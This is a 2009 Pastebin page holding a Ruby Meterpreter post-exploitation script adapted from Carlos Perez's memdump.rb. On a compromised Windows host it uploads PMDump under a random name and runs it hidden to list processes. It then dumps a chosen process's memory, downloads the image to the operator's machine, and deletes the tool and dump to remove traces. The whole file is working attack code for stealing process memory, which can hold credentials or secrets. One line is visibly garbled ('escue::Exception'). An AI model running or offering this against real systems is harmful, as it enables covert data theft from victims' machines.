Guest User

redmeat_uk

a guest
Sep 26th, 2009
624
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env ruby
  2.  
  3. # Meterpreter script for dumping target memory for a particular process using Arne Vidstrom's PMDump tool - http://ntsecurity.nu/toolbox/pmdump/
  4.  
  5. # This is a modified version of memdump.rb a script written by Carlos Perez (Dark Operator) - http://www.darkoperator.com/blog/2009/3/10/meterpreter-memory-dump-script.html
  6.  
  7. # modified by: redmeat_uk@hotmail.com
  8. # date: 26/09/2009
  9.  
  10. require 'readline'
  11.  
  12. session = client
  13. # Script Options
  14. @@exec_opts = Rex::Parser::Arguments.new(
  15.                 "-h" => [ false,  "Help menu."                        ],
  16.                 "-t" => [ true,  "Change the timeout default 5min. Specify timeout in seconds"]
  17.                 )
  18. # Expand enviroment %TEMP% variable to get location for storing image
  19. tmp = session.fs.file.expand_path("%TEMP%")
  20. # Create random name for the memory image
  21. imgname = sprintf("%.5d",rand(100000))
  22. # Setting timeout for command variable
  23. timeoutsec = 300
  24.  
  25. #---------------------------------------------------------------------------------------------------------
  26. #Dumping memory image
  27. def memdump(session,tmp,imgname,timeoutsec)
  28.         tmpout = []
  29.         pmexe = File.join(Msf::Config.install_root, "data", "pmdump.exe")
  30.         pmscramble = sprintf("%.5d",rand(100000))
  31.         print_status("Uploading pmdump for dumping memory of a process....")
  32.         begin
  33.                 session.fs.file.upload_file("#{tmp}\\#{pmscramble}.exe","#{pmexe}")
  34.                 print_status("pmdump uploaded as #{tmp}\\#{pmscramble}.exe")
  35. escue::Exception => e
  36.                         print_status("The following Error was encountered: #{e.class} #{e}")
  37.         end
  38.         session.response_timeout=timeoutsec
  39.         print_status("Process list...")
  40.         begin
  41.                 r = session.sys.process.execute("cmd.exe /c #{tmp}\\#{pmscramble}.exe -list", nil, {'Hidden' => 'true','Channelized' => true})
  42.  
  43.                 while(d = r.channel.read)
  44.                         print_status("#{d}")
  45.                 end
  46.                 r.channel.close
  47.                 r.close
  48.                
  49.                         line = Readline::readline('Please enter PID: ')
  50.                         Readline::HISTORY.push(line)
  51.  
  52.                 rescue::Exception => e
  53.                         print_status("The following Error was encountered: #{e.class} #{e}")
  54.                 end
  55.  
  56.                 print_status("Dumping memory for process id #{line}")
  57.                 begin
  58.                 n = session.sys.process.execute("cmd.exe /c #{tmp}\\#{pmscramble}.exe #{line} #{tmp}\\#{imgname}", nil, {'Hidden' => 'true','Channelized' => true})
  59.                 while(d = n.channel.read)
  60.                         tmpout << d
  61.                 end
  62.                 n.channel.close
  63.                 n.close
  64.                        
  65.                 print_status("Finished dumping process's memory")
  66.  
  67.                 rescue::Exception => e
  68.                         print_status("The following Error was encountered: #{e.class} #{e}")
  69.                 end
  70.                 print_status("Downloading memory dump for process id #{line} to /tmp/pmdump-#{imgname}")
  71.  
  72.                  session.fs.file.download_file("/tmp/pmdump-#{imgname}", "#{tmp}\\#{imgname}")
  73.                  print_status("Deleting pmdump.exe from target...")
  74.  
  75.                  session.sys.process.execute("cmd.exe /c del #{tmp}\\#{pmscramble}.exe", nil, {'Hidden' => 'true'})
  76.  
  77.  
  78.                 print_status("pmdump.exe deleted")
  79.                 print_status("Deleting left over files...")
  80.                 session.sys.process.execute("cmd.exe /c del #{tmp}\\#{imgname}", nil, {'Hidden' => 'true'})
  81.                 print_status("process memory dump image on target deleted")
  82. end
  83.  
  84. ################## MAIN ##################
  85. # Parsing of Option
  86. hlp = 0
  87. chk = 0
  88. @@exec_opts.parse(args) { |opt, idx, val|
  89.         case opt
  90.                 when "-t"
  91.                         timeoutsec = val
  92.                 when "-h"
  93.                         hlp = 1
  94.                         print(
  95.                         "Process Memory Dumper Meterpreter Script\n" +
  96.                         @@exec_opts.usage                      
  97.                         )
  98.                         break
  99.                 end
  100.  
  101. }
  102. if (hlp == 0)
  103.         if (chk == 0)
  104.                 print_status("Running Meterpreter Process Memory Dump Script.....")
  105.                 memdump(session,tmp,imgname,timeoutsec)
  106.         end
  107. end
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×